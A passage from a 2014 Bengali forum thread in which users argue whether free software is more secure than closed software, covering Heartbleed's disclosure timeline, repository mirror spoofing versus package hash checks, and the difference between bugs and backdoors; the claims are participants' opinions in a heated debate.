উন্মোচন করেছিলেন (৩রা এপ্রিল ২০১৪ইং) এবং যথাদ্রুত সম্ভব (৭ই এপ্রিল ২০১৪ইং) এই বাগ দূরীভূতও হয়েছে। উল্লেখ্য যে এটা আরোপিত কোন ক্ষতিকারক কোড ইচ্ছেকৃতভাবে সম্বলিত করে দেবার মতো কোন প্রয়াস ছিলো না। সফটওয়্যারে বিভিন্ন ত্রুটি হতেই পারে তবে কে বা কাঁরা সেটা সমাধান করতে সচেষ্ট হয় এবং কতটা জনস্বার্থের প্রতি লক্ষ্য রেখে কত দ্রুত সেটা করা হয় সেটাই আসলে দেখার বিষয়। এই প্রকল্পটা কিন্তু কোন বানিজ্যিক প্রকল্প নয় বরংচ মুক্তপ্রযুক্তির পথ চলতে প্রয়োজনীয় একটা উদ্যোগ যা এখনো অবদি স্বেচ্ছাসেবীতার মাধ্যমেই চলছে।

পয়সার বিনিময়ে কাজ করা ডেভেলপারদের সাথে যদি স্বেচ্ছাসেবায় করা কোন প্রকল্পের তুলনা করতে যাওয়া হয় তো সেটা অসম তুলনা। তারপরেও যদি স্বেচ্ছাসেবীতার সেই সব প্রকল্পগুলোই সর্বোচ্চ মাত্রার আউটপুট দিতে থাকে তো বলবার আর কি থাকে?

প্রিয় শাবাব, আমার জানামতে সফটওয়্যারের বাগ আর ইচ্ছেকৃতভাবে কারোর দ্বারা যোগ করা ক্ষতিকারক কোড/এক্সপ্লয়েট/ব্যাকডোর কিন্তু এক জিনিষ না। যদি দুটো একই জিনিষ হয়ে থাকে অনুগ্রহ করে আমাকে একটু জানাবে, বুঝিয়ে বলবে। আচ্ছা প্রযুক্তির জগতেই প্রশ্নের মুখে পড়া কোন সফটওয়্যারের ব্যাকডোর যদি মাসের পর মাস, বছরের পর বছর জুড়ে, একটা সংস্করন থেকে আরেকটা সংস্করনে বিভিন্ন নাম/চেহারা নিয়ে বজায় থাকে তবে কি সেটাকেও "বাগ'ই বলে? বিষয়গুলো নিয়ে সত্যিই আমি জানতে-শুনতে আগ্রহী।

সাইফুল_বিডি লিখেছেন:

স্পুফিং এর সাথে মজিলা / ক্রোমের সম্পর্ক কি সেটাই বুঝলাম না।

তৌফিক ইমামের করা প্রশ্নটা একটু খেয়াল করবেন কি? ওখানে জিজ্ঞেস করা হয়েছিলো যে যদি কেউ নিজে ম্যানিপুলেট করা সফটওয়্যার বানায়ও তবে সেটা কি মেইন রিপোতে ইনজেক্ট করতে পারবে কি না? আপনি তাঁর উত্তরে বলেছিলেন দাদবাড়ীর ঠিকানায় যাবার কথা বলে নানাবাড়ী চলে যাবে (ডিএনএস স্মুফিং)। যেহেতু ইন্টারনেটে যেতে হলে সাধারন ব্যবহারকারীরা কোন না কোন ব্রাউজার কিংবা ক্লায়েন্ট টুল/সফটওয়্যার ব্যবহার করবেন তাই সেরকমই দুটো ব্রাউজারের নামোল্লেখ করে জানতে চেয়েছিলাম মাত্র।

সাইফুল_বিডি লিখেছেন:

আপনাকে বুঝাই , যেহেতু আপনি গরিব মানুষ VPN / প্রাইভেট টানেল ব্যবহার করার ক্ষমতা আপনার নাই, সেহেতু আপনি আপনার লোকাল ISP র লাইন দিয়ে লিনাক্স এর মেইন রেপোতে ডুকলেন। এবার মুল কাহিনিতে আশা যাক, মনে করুন আমি সেই ISP মালিক, আমি আপনার কাঙ্খিত রেপোটির একটি মিরর করে আমার ISP সার্ভারে আপ করলাম , এবার আপনার রেপোটির লিংক সরাসরি হোস্ট মডিফাই করে আমার সার্ভারে লোকেট করে দিলাম। আর কিছু বলতে হবে ?

বুঝিয়ে বলবার জন্যে ধন্যবাদ। সাইফুল ভাই শুধুমাত্র মিররিং করে নিজের সার্ভারে প্যাকেজগুলো সব রাখলেই যদি প্যাকেজ ম্যানিপুলেট করে সিস্টেমে পুশ করতে পারতো যে কোন প্রযুক্তি প্রতিষ্ঠান তবে সেই কাজ না করে এনএসএ এর মতো প্রতিষ্ঠান আড়িপাতার রাস্তায় হাঁটতো না, ব্যাকডোর নিয়েও এতো খেলা খেলতো না।

আপনার নজরে বোধহয় তৌফিক ইমামের দেয়া প্রশ্নের মাঝেই হ্যাশ চেকিং সংক্রান্ত অংশটা বাদ পড়ে গিয়েছে। শুধু মূল রিপোর মিরর হলেই চলে যায় না একটা মিরর রিপোর প্যাকেজগুলো। ওগুলোর প্রতিটার হ্যাশসাম মিলতে হয় মূল সার্ভারে থাকা রিপোর প্যাকেজ হ্যাশসামের সাথে। আপনি যে সফটওয়্যার/টুলস ম্যানিপুলেট করবেন তাতে দুইটা লাইন/শব্দ হলেও তো যোগ/বিয়োগ করবেন? তাতেই কিন্তু প্যাকেজ বিল্ড করার পর হ্যাশসামে গড়মিল হয়ে যাবে।

সাইফুল ভাই আপনি কিন্তু মেইন রিপো তে প্যাকেজ বা ক্ষতিকারক সোর্স ইচ্ছেকৃতভাবে ঢুকিয়ে দিতে পারছেন না যেটুকু যা করছেন তা মেইন রিপো থেকে সরে এসে নিজের মতো করে গড়া নিজের সার্ভারে/মিররে। যতই ঘুরপথে নেন আর ফাঁকি দেন এটা তো আর সরাসরি মূল রিপো না।

একজন সঙ্গীত শিল্পী সৃষ্টির প্রথম প্রয়াস শুরুই হয় ভোর সকালে সারগাম করে গলা সাধা দিয়ে। তাতে আর কারোর না হোক নিজ পরিবারের মানুষজনের সকালের সুখঘুমটা অবশ্যই বিঘ্নিত হয়। তবে যদি বিরক্তির মাত্রাটাকে আমলে নিয়ে গলা সাধায় বাধ সাধি তবে সঙ্গীত শিল্পী আর আমরা আগামীতে পাবো না। এইটুকু যদি বোধে থাকে আর দর্শকমাতানো শিল্পী যদি নিজের ঘরেই পেতে চাই তবে ঐ গলা সাধার সময়ে নিজের সুখঘুমটুকু বিসর্জন দেবার মানসিকতা গড়ে তুলতে হবে, আমার আপনার সবারই।

রিং'এর ওয়েবসাইট

লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত

৩৩

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

রিং লিখেছেন:

উন্মোচন করেছিলেন (৩রা এপ্রিল ২০১৪ইং) এবং যথাদ্রুত সম্ভব (৭ই এপ্রিল ২০১৪ইং) এই বাগ দূরীভূতও হয়েছে।

According to Mark J. Cox of OpenSSL, Neel Mehta of Google's security team reported Heartbleed on April 1, 2014.

এই ব্যাক্তির সকল লেখা কাল্পনিক , জীবিত অথবা মৃত কারো সাথে মিল পাওয়া গেলে তা সম্পুর্ন কাকতালীয়, যদি লেখা জীবিত অথবা মৃত কারো সাথে মিলে যায় তার দায় এই আইডির মালিক কোনক্রমেই বহন করবেন না। এই ব্যক্তির সকল লেখা পাগলের প্রলাপের ন্যায় এই লেখা কোন প্রকার মতপ্রকাশ অথবা রেফারেন্স হিসাবে ব্যবহার করা যাবে না।

৩৪ সর্বশেষ সম্পাদনা করেছেন রিং (১৭-০৯-২০১৪ ০২:৪৪)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

সাইফুল_বিডি লিখেছেন:
রিং লিখেছেন:

উন্মোচন করেছিলেন (৩রা এপ্রিল ২০১৪ইং) এবং যথাদ্রুত সম্ভব (৭ই এপ্রিল ২০১৪ইং) এই বাগ দূরীভূতও হয়েছে।

According to Mark J. Cox of OpenSSL, Neel Mehta of Google's security team reported Heartbleed on April 1, 2014.

ভাই আমি একজন মানুষ এবং আমার ভুল হলেও হতে পারে। তবে নিচে উল্লেখিত অংশটা ছিলো আমার সংগৃহীত ও উল্লেখিত তথ্যের উৎস

Who coordinates response to this vulnerability?

Immediately after our discovery of the bug on 3rd of April 2014, NCSC-FI took up the task of verifying it, analyzing it further and reaching out to the authors of OpenSSL, software, operating system and appliance vendors, which were potentially affected. However, this vulnerability had been found and details released independently by others before this work was completed. Vendors should be notifying their users and service providers. Internet service providers should be notifying their end users where and when potential action is required.

রিং'এর ওয়েবসাইট

লেখাটি CC by-sa 3.0 এর অধীনে প্রকাশিত

৩৫

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

রিং লিখেছেন:

আপনার নজরে বোধহয় তৌফিক ইমামের দেয়া প্রশ্নের মাঝেই হ্যাশ চেকিং সংক্রান্ত অংশটা বাদ পড়ে গিয়েছে। শুধু মূল রিপোর মিরর হলেই চলে যায় না একটা মিরর রিপোর প্যাকেজগুলো। ওগুলোর প্রতিটার হ্যাশসাম মিলতে হয় মূল সার্ভারে থাকা রিপোর প্যাকেজ হ্যাশসামের সাথে। আপনি যে সফটওয়্যার/টুলস ম্যানিপুলেট করবেন তাতে দুইটা লাইন/শব্দ হলেও তো যোগ/বিয়োগ করবেন? তাতেই কিন্তু প্যাকেজ বিল্ড করার পর হ্যাশসামে গড়মিল হয়ে যাবে।

দাদা আমি কি বলেছি যারা হ্যাস চেক করে তারা নবীশ ব্যবহারকারী ?
কটা এপ ইন্সটল করে হ্যাস চেক করেছেন এ পর্যন্ত ?
কজন এডভান্স সিস্টেম উইজারকে দেখেছে চিপায় পড়তে ?
আরে দাদা https://help.ubuntu.com/community/UbuntuHashes এর একটা লাইভ ম্যানুপুলেটেড মিরর করতে ঠিক কতক্ষন লাগে ? আপনি কি এদের ডিস্ট্রোর সাথে এই ঠিকানার হ্যাস মিলাবেন না ?

যাই হোক দাদা তালগাছ যার মন চায় সে নিক আমার কিছু আসে যায় না। এই টপিকে এটাই লাস্ট কমেন্ট।

এই ব্যাক্তির সকল লেখা কাল্পনিক , জীবিত অথবা মৃত কারো সাথে মিল পাওয়া গেলে তা সম্পুর্ন কাকতালীয়, যদি লেখা জীবিত অথবা মৃত কারো সাথে মিলে যায় তার দায় এই আইডির মালিক কোনক্রমেই বহন করবেন না। এই ব্যক্তির সকল লেখা পাগলের প্রলাপের ন্যায় এই লেখা কোন প্রকার মতপ্রকাশ অথবা রেফারেন্স হিসাবে ব্যবহার করা যাবে না।

৩৬ সর্বশেষ সম্পাদনা করেছেন রিং (১৭-০৯-২০১৪ ০৩:২২)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

সাইফুল ভাই তৌফিক ইমামের করা প্রশ্নটা ছিলো যে -- যদি কেউ নিজে ম্যানিপুলেট করা সফটওয়্যার বানায়ও তবে সেটা কি মেইন রিপোতে ইনজেক্ট করে দিতে পারবে কি না? সরাসরি প্রশ্নটার উত্তরে যদি "হ্যাঁ' হয় তো ব্যাখ্যাটুকু দিন না ভাই। কেন আর কিভাবে করা যাবে "না' সে ব্যাখ্যা তো আমি আমার জ্ঞান অনুযায়ী দিচ্ছিই।

সাইফুল_বিডি লিখেছেন:

দাদা আমি কি বলেছি যারা হ্যাস চেক করে তারা নবীশ ব্যবহারকারী ? কটা এপ ইন্সটল করে হ্যাস চেক করেছেন এ পর্যন্ত ?

ডেবিয়ান সিস্টেমে apt-get বা অন্যান্য সব প্যাকেজ ইন্সটলারই এই হ্যাশচেক করে তারপর ডাউনলোড করা প্যাকেজ সিস্টেম এক্সট্রাক্ট করে। হ্যাশ না মিললে প্যাকেজ এরর রিটার্ন করবে।

সাইফুল_বিডি লিখেছেন:

কজন এডভান্স সিস্টেম উইজারকে দেখেছে চিপায় পড়তে?

ভাইরে প্যাকেজ বা রিপোজিটরি স্মুফিংয়ের জালে ধরা খাবার সুযোগ যে একেবারেই নগন্য। সিস্টেমই তো এখানে সাধারন ব্যবহারকারীর নিরাপত্তা নিশ্চিত করছে।

সাইফুল_বিডি লিখেছেন:

আরে দাদা https://help.ubuntu.com/community/UbuntuHashes এর একটা লাইভ ম্যানুপুলেটেড মিরর করতে ঠিক কতক্ষন লাগে ? আপনি কি এদের ডিস্ট্রোর সাথে এই ঠিকানার হ্যাস মিলাবেন না ?

যদিও এটা প্যাকেজ রিপো না, আইএসও বা সিডি/ডিভিডি রিপো তবুও এখানকার একটা আইএসও সামান্যতম পরিবর্তন করে দেখেন তো রিবিল্ডে হ্যাশ মিলে কি না? আর ফলাফলে কাস্টম রিবিল্ড করা ছাড়া ঐ আইএসওটা বুট করে কি না?

রিং'এর ওয়েবসাইট

লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত

৩৭ সর্বশেষ সম্পাদনা করেছেন রেজওয়ানুর (১৭-০৯-২০১৪ ০৩:২১)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

রিং লিখেছেন:

ভাই আমি একজন মানুষ এবং আমার ভুল হলেও হতে পারে। তবে নিচে উল্লেখিত অংশটা ছিলো আমার সংগৃহীত ও উল্লেখিত তথ্যের উৎস।

ওওহ, রিং ভাই মনে হয় একই পেজে থাকা এই দুটো প্যারা কোট করতে মনে হয় ভুলে গিয়েছিলেন...

Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.

এবং...

Some operating system distributions that have shipped with potentially vulnerable OpenSSL version:

    Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
    Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
    CentOS 6.5, OpenSSL 1.0.1e-15
    Fedora 18, OpenSSL 1.0.1e-4
    OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)
    FreeBSD 10.0 - OpenSSL 1.0.1e 11 Feb 2013
    NetBSD 5.0.2 (OpenSSL 1.0.1e)
    OpenSUSE 12.2 (OpenSSL 1.0.1c)

মজার ব্যাপার হচ্ছে এতোগুলো মুক্ত সফটওয়্যারের রিপোতে এই বাগ মোটামুটি দুই বছর লুকিয়ে থাকলো আর এতশত এক্সপার্ট কোড দেখনেওয়ালারাও ধরতে পারলো না।


কথার কথা, ধরেন OpenSSL এর সিকিউরিটি আমার জন্য কোন এক ভাবে খুব গুরূত্বপূর্ণ  হয়ে গেলো। তো তখন এইরকম সিচুয়েশনে আমি হলে কি করতাম? প্রতি লাইন কোড চেক করে বাগ দুর করতাম? নাকি ধরে নিতাম যে বাঘা বাঘা প্রোগ্রামাররা যেটাকে সেফ বলেছেন সেটাকেই নিশ্চিন্ত মনে ব্যবহার করা যায়? তো আমি, আমজনতা যদি শেষ পর্যন্ত আরেকজনের উপরেই বিশ্বাস রেখে রেখে সফটওয়্যার ব্যবহার করতে হয়, তাহলে কি এটা খুব গুরূত্বপূর্ণ যে এর কোড ওপেন না ক্লোজড, নাকি আমি এর সাথে রিলেভেন্ট ইনফরমেশন (কে বানিয়েছে এবং তার রেপুটেশন কেমন, সফটওয়্যারের ফীডব্যাক কেমন, ইত্যাদি) গুলোকে  বেশি গুরুত্ব দেবো?

ধরে নিচ্ছি আপনি কখনো না কখনো VLC ব্যবহার করেছেন। তো কখনো কি এর সোর্স চেক করে দেখেছেন যে কি আছে এতে?  আর এটি ইউজার এক্সপেরিয়েন্স রিলেটেড কি কি ইনফরমেশন সংগ্রহ করে?


আর এক্সপ্লয়েটের ব্যাপারে একটা শুধু উদাহরণ দিয়ে রাখি, এ্যান্ড্রয়েড, ওপেন সোর্স হওয়া সত্যেও প্রায় প্রতিটি ভার্সান রুট করা সম্ভব, কিভাবে?


বিশ্বাস রাখা ভালো, যতক্ষণ পর্যন্ত তা অন্ধ না হয়ে যায়।

লেখাটি CC by 3.0 এর অধীনে প্রকাশিত

৩৮ সর্বশেষ সম্পাদনা করেছেন উন্মাতাল_তারুণ্য (১৭-০৯-২০১৪ ১৫:২৮)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

রিং লিখেছেন:

এই ওপেন এসএসএল ডেক্সটপ কম্পিউটিংয়ে ব্যবহৃত কোন নিয়মিত সফটওয়্যার বা টুলস নয় ফলে সাধারন ব্যবহারকারীদের কম্পিউটারে এটার দ্বারা কোনরূপ কোন ক্ষতিসাধনের সম্ভাবনা প্রায় নেই বললেই চলে।

রিং লিখেছেন:

তবে হ্যাঁ এটা ঠিক যে অনলাইনে ব্যক্তিতথ্যের নিরাপত্তা অবশ্যই উভয়প্রান্তেই ক্ষতিগ্রস্ত হয়েছে।

লাইন দুটো কন্ট্রাডিকটরি হয়ে গেল না? 'অনলাইনে ব্যক্তিতথ্য' কি অসাধারণ ব্যবহারকারীদের থাকে?

OpenSSL সাধারণ ব্যবহাকারীরাও ব্যবহার করেন অসাধারণ সফটওয়্যারের ডিপেন্ডেন্সি হিসেবে। দয়া করে "কোথায় ব্যবহার করে দেখিয়ে দিন" টাইপের অযথা বালখিল্য প্রশ্ন করবেন না। আপনার ভাল করেই জানার কথা কোথায় কোথায় করে।

রিং লিখেছেন:

সফটওয়্যারের বাগ আর ইচ্ছেকৃতভাবে কারোর দ্বারা যোগ করা ক্ষতিকারক কোড/এক্সপ্লয়েট/ব্যাকডোর কিন্তু এক জিনিষ না। যদি দুটো একই জিনিষ হয়ে থাকে অনুগ্রহ করে আমাকে একটু জানাবে, বুঝিয়ে বলবে।

আমার পয়েন্টটা এখানেই। "মুক্ত সফটওয়্যার ব্যবহার করলে আপনি নিরাপদ" এই প্রবাদ মানতে আমার প্রবল আপত্তি। আপনি 'বাগ' নামেই ডাকুন আর 'ব্যাকডোর' নামেই ডাকুন, দুটোই secutiry vulnerbility, তাই না! অতএব, দিন শেষে এই সম্ভাবনা দুই দিকেই থাকছে। 

যাকগে, ব্যস্ত দিনকাল যাচ্ছে। এই আজাইরা বাহাসে আর নষ্ট করার মত সময় দিতে পারছি না। বিদায়।

" 'কত বড়ো আমি' কহে নকল হীরাটি। তাই তো সন্দেহ করি নহ ঠিক খাঁটি॥ " - রবীন্দ্রনাথ ঠাকুর

৩৯

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

সাইফুল ভাইকে ধন্যবাদ ১ম মন্তব্যটি করার জন্য।
সাইফুল ভাই আপনি একটি গুরুত্বপূর্ণ ইস্যু তুলে ধরেছেন। বিভিন্ন দেশের সরকার নানান ইন্টারেস্ট থেকেই ব্যক্তিগত তথ্যে উকিঝুঁকি মারছে। তাই এটি বন্ধ করা বেশ দুরুহ ব্যাপার।
এক্ষেত্রে আমার মতামত হল আমি খালি মাঠে গোল দিতে দিব না। আমি আমার পক্ষ থেকে সর্বোচ্চ চেষ্ট করব যাতে করে আমার ব্যক্তিগত তথ্যে কেউ উকিঝুকি না মারতে পারে এবং এর জন্য নিজেকে একজন সচেতন প্রযুক্তি ব্যবহারকারী হিসেবে গড়ে তুলতে সচেষ্ট হব।

বাক্যবাগীশ ভাই।
আপনি আমার কাছে যা জানতে চেয়েছিলেন তার উত্তর আগেই রিং ভাই দিয়ে দিয়েছেন। সেটুকুই যথেষ্ট। আমি আর নতুন করে কিছু বললাম না।

প্রিয় সবাই!
প্রজন্ম ফোরামে এর আগে আমার কোন পোস্টে এতটা মন্তব্য/প্রতুত্তর আসেনি। সবাই মিলে যে উন্মুক্ত আলোচন করলেন এর জন্য আপনাদের সবাইকে ধন্যবাদ জানাচ্ছি।
আপনাদের আলোচনায় আমার যে বিষয়টা ভাল লাগল তা হল আমরা সবাই ব্যক্তিগত তথ্যচুরির বিষয়টি অবগত আছি। এই জানাই আমাদের ভবিষ্যৎ কর্মের পাথেয় হোক এই আশাই রইল।

সগীর হোসাইন খান তথ্য ও গবেষণা সচিব এফওএসএস বাংলাদেশ

৪০ সর্বশেষ সম্পাদনা করেছেন রিং (১৮-০৯-২০১৪ ০০:৪২)

Re: "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ

উন্মাতাল_তারুণ্য লিখেছেন:
রিং লিখেছেন:

এই ওপেন এসএসএল ডেক্সটপ কম্পিউটিংয়ে ব্যবহৃত কোন নিয়মিত সফটওয়্যার বা টুলস নয় ফলে সাধারন ব্যবহারকারীদের কম্পিউটারে এটার দ্বারা কোনরূপ কোন ক্ষতিসাধনের সম্ভাবনা প্রায় নেই বললেই চলে।

রিং লিখেছেন:

তবে হ্যাঁ এটা ঠিক যে অনলাইনে ব্যক্তিতথ্যের নিরাপত্তা অবশ্যই উভয়প্রান্তেই ক্ষতিগ্রস্ত হয়েছে।

লাইন দুটো কন্ট্রাডিকটরি হয়ে গেল না? 'অনলাইনে ব্যক্তিতথ্য' কি অসাধারণ ব্যবহারকারীদের থাকে?

না হয়নি। ভাইরে আমি বুঝিয়েছিলাম অফলাইন আর অফলাইন ব্যবহারকারী হিসেবে। সেখানে তুমি তো নিজেই বুঝে নিলে সাধারন আর অসাধারন ব্যবহারকারী হিসেবে। ওপেন এসএসএল মূলত অনলাইনে কোন ব্যক্তিতথ্য (পাসওয়ার্ড, সিক্রেট কী, ক্রেডিট কার্ডের তথ্য) পরিবহনের সময়ে সেগুলোর নিরাপত্তা বিধানের লক্ষ্যে পরিবহন পথ নিরাপদ করবার একটা প্রক্রিয়া। তোমার হিসাবেও যদি ধরি তো সাধারন আর অসাধারন ব্যবহারকারী দুইজনের ক্ষেত্রেই বিষয়টা একই ঘটবে।  অনলাইনে/ওয়েবসাইটে তথ্যগুলো দিলে নিরাপত্তা বিপন্ন হলেও হতে পারে তবে অফলাইনে বা নিজের পিসিতে রাখলে নয়। smile

উন্মাতাল_তারুণ্য লিখেছেন:

OpenSSL সাধারণ ব্যবহাকারীরাও ব্যবহার করেন অসাধারণ সফটওয়্যারের ডিপেন্ডেন্সি হিসেবে। দয়া করে "কোথায় ব্যবহার করে দেখিয়ে দিন" টাইপের অযথা বালখিল্য প্রশ্ন করবেন না। আপনার ভাল করেই জানার কথা কোথায় কোথায় করে।

উপরের অংশে যেটুকু আলোচনা করেছি তাতে নিশ্চয়ই বোঝা যাচ্ছে যে "বালখিল্য' করতে প্রশ্নটা করিনি, জানি বলেই জানতে চেয়েছি তোমার মতামত এবং যথাসম্ভব সঠিক তথ্যটা জানাতে চেয়েছি সবাইকে।

উন্মাতাল_তারুণ্য লিখেছেন:
রিং লিখেছেন:

সফটওয়্যারের বাগ আর ইচ্ছেকৃতভাবে কারোর দ্বারা যোগ করা ক্ষতিকারক কোড/এক্সপ্লয়েট/ব্যাকডোর কিন্তু এক জিনিষ না। যদি দুটো একই জিনিষ হয়ে থাকে অনুগ্রহ করে আমাকে একটু জানাবে, বুঝিয়ে বলবে।

আমার পয়েন্টটা এখানেই। "মুক্ত সফটওয়্যার ব্যবহার করলে আপনি নিরাপদ" এই প্রবাদ মানতে আমার প্রবল আপত্তি। আপনি 'বাগ' নামেই ডাকুন আর 'ব্যাকডোর' নামেই ডাকুন, দুটোই secutiry vulnerbility, তাই না! অতএব, দিন শেষে এই সম্ভাবনা দুই দিকেই থাকছে।

ভাইরে তুমি/তোমরা একটা সহজ বিষয় সোজা করে না বলে কেন ঘুরপথে বারংবার বলে যাচ্ছো তা তোমরাই ভালো জানো। তবে আমি স্পষ্ট করে যেটুকু বুঝি তাতে "বাগ' বলতে সফটওয়্যারের সেই ত্রুটিকে বোঝায় যেটুকু কেউ ইচ্ছে করে তৈরী করে না। অনেকের করা কোড মিলে যেহেতু একটা সফটওয়্যার তৈরী হয় তাই একের করা কোড আরেকজনের কোডের সাথে সামান্য মিসম্যানেজ হলেই সৃষ্টি হতে পারে যে কোন রকমের সমস্যার। এই "বাগ' বা ত্রুটিটাই যদি কেউ বা কোন কোম্পানী ইচ্ছেকৃতভাবে তৈরী করে দেয়া অন্য কারোর অনৈতিক সুবিধার লক্ষ্যে তবে সেটা বলে "ব্যাকডোর'।

অতএব, সফটওয়্যার "বাগ' == নিয়মিত চলমান অবস্থার মাঝেই যে কোন সফটওয়্যারে হুট করেই সৃষ্ট/আবিষ্কৃত কোন সমস্যা, যেটা ধরা পড়া মাত্রই সারিয়ে তোলার উদ্যোগ নেয়া হবে এবং সকল ব্যবহারকারীকে সতর্ক করে দেয়া হবে ত্রুটিটির বিষয়ে। আর সফটওয়্যার "ব্যাকডোর' == সফটওয়্যারের ব্যবহারে নির্দিষ্ট কিছু ব্যক্তি বা প্রতিষ্ঠানের জন্য ইচ্ছেকৃতভাবে সৃষ্ট সমস্যা যেটা প্রযুক্তিবিদদের কাছে ধরা পড়ে গেলে নতুন করে আরেকটা চোরাই পথ তৈরী করে দেয়া হবে কিন্তু কোনক্রমেই ত্রুটিটা সারিয়ে তোলা হবে না।

মুক্তপ্রযুক্তির সফটওয়্যারগুলোর ক্ষেত্রে কোন মুক্তপ্রযুক্তি মানোন্নয়নকারীই "ব্যাকডোর' তো দূরে থাক ইচ্ছেকৃতভাবে একটা "বাগ' রেখেও কোন সফটওয়্যারের কোড মুক্তপ্রযুক্তির জগতে উন্মুক্ত করে না। অপরপক্ষে ক্লোজড বা লুকায়িত সোর্সের সফটওয়্যারগুলোতে আজ অবদি যে "ব্যাকডোর'গুলো পাওয়া গেছে সেগুলোর প্রতিটাই আমজনতা ব্যবহারকারীদের তথ্যে বিশেষ গোয়েন্দাবৃত্তি/চুরি/বেদখলের লক্ষ্যেই তৈরীকৃত বলে প্রমাণিত হয়েছে।

খেয়াল করে দেখো যে, এই হার্টব্লিড বাগে আক্রান্ত কোন সিস্টেম থেকে কোন তথ্য স্বয়ংক্রিয়ভাবে কোথাও আপলোড হয়ে যায়নি কিংবা হ্যাকার কর্তৃক আক্রান্ত হওয়া ছাড়া তথ্য ক্ষতিগ্রস্ত হবার মতো পর্যায়ের অনিরাপদ থাকলেও ক্ষতিগ্রস্ত হয়নি এবং "বাগ' রিপোর্ট হবার পর দ্রুততম সময়ে এই ত্রুটি সারিয়ে ফেলা গিয়েছে। একই সাথে সকল ব্যবহারকারীদেরকে বিষয়টা সম্পর্কে গনবিজ্ঞপ্তি দিয়ে জানিয়েছেন সফটওয়্যারটির প্রস্তুতকারক/দের পক্ষ থেকে। পক্ষান্তরে ক্লোজড সোর্স পন্যের মাঝে বিখ্যাত মাইক্রোসফটের উইন্ডোজ ওএস এ "এনএসএ কী নামক ব্যাকডোর'টি আজ অবদি ভিন্নভিন্ন নামে বিদ্যমান। এটাকে সারিয়ে তোলা দূরে থাক সরিয়ে নেবার কোন চেষ্টা না করে বরংচ মাইক্রোসফট এটাকে ভি্ন্ন নামে একটা থেকে আরেকটা ওএস রিলিজেের সাথে ব্যবহারকারীদের সাথে কম্পিউটারে ঢুকিয়ে দিয়েছে। এবং ধরা পড়বার পর বিষয়টা নিয়ে নিজের ব্যবহারকারীদে নিরাপত্তা বিধানে কি করা হচ্ছে, কি করনীয় সে বিষয়টা কোনদিনই কখনো পরিষ্কার করে বলেনি এমএস।

"মুক্ত সফটওয়্যার ব্যবহার করলে ব্যবহারকারী নিরাপদ' এই প্রবাদ মানতে তোমার প্রবল আপত্তিটুকু আশা করি দ্রুতই লাঘব হতে যাচ্ছে।

উন্মাতাল_তারুণ্য লিখেছেন:

যাকগে, ব্যস্ত দিনকাল যাচ্ছে। এই আজাইরা বাহাসে আর নষ্ট করার মত সময় দিতে পারছি না। বিদায়।

তোমার কাছে কেন এটা হুটকরে "আজাইরা বাহাস' মনে হলো আমি জানি না। তবে আমার কাছে এই আলোচনাগুলো আসলেই গুরুত্বপূর্ণ ছিলো। কিছু কিছু অংশ থেকে আমি নিজের জ্ঞান ঝালিয়ে নিতে পেরেছি, নতুন কিছু শিখেছি আবার কোথাও কোথাও নিজের জানা থেকে সবাইকে জানাতে চেষ্টা করেছি। এটাই সুস্থ বিতর্কের মাধ্যমে জ্ঞানের চর্চা। ভালো থেকো, নিরাপদে থেকো প্রযুক্তি জীবনে সে কামনা রইলো।

রিং'এর ওয়েবসাইট

লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত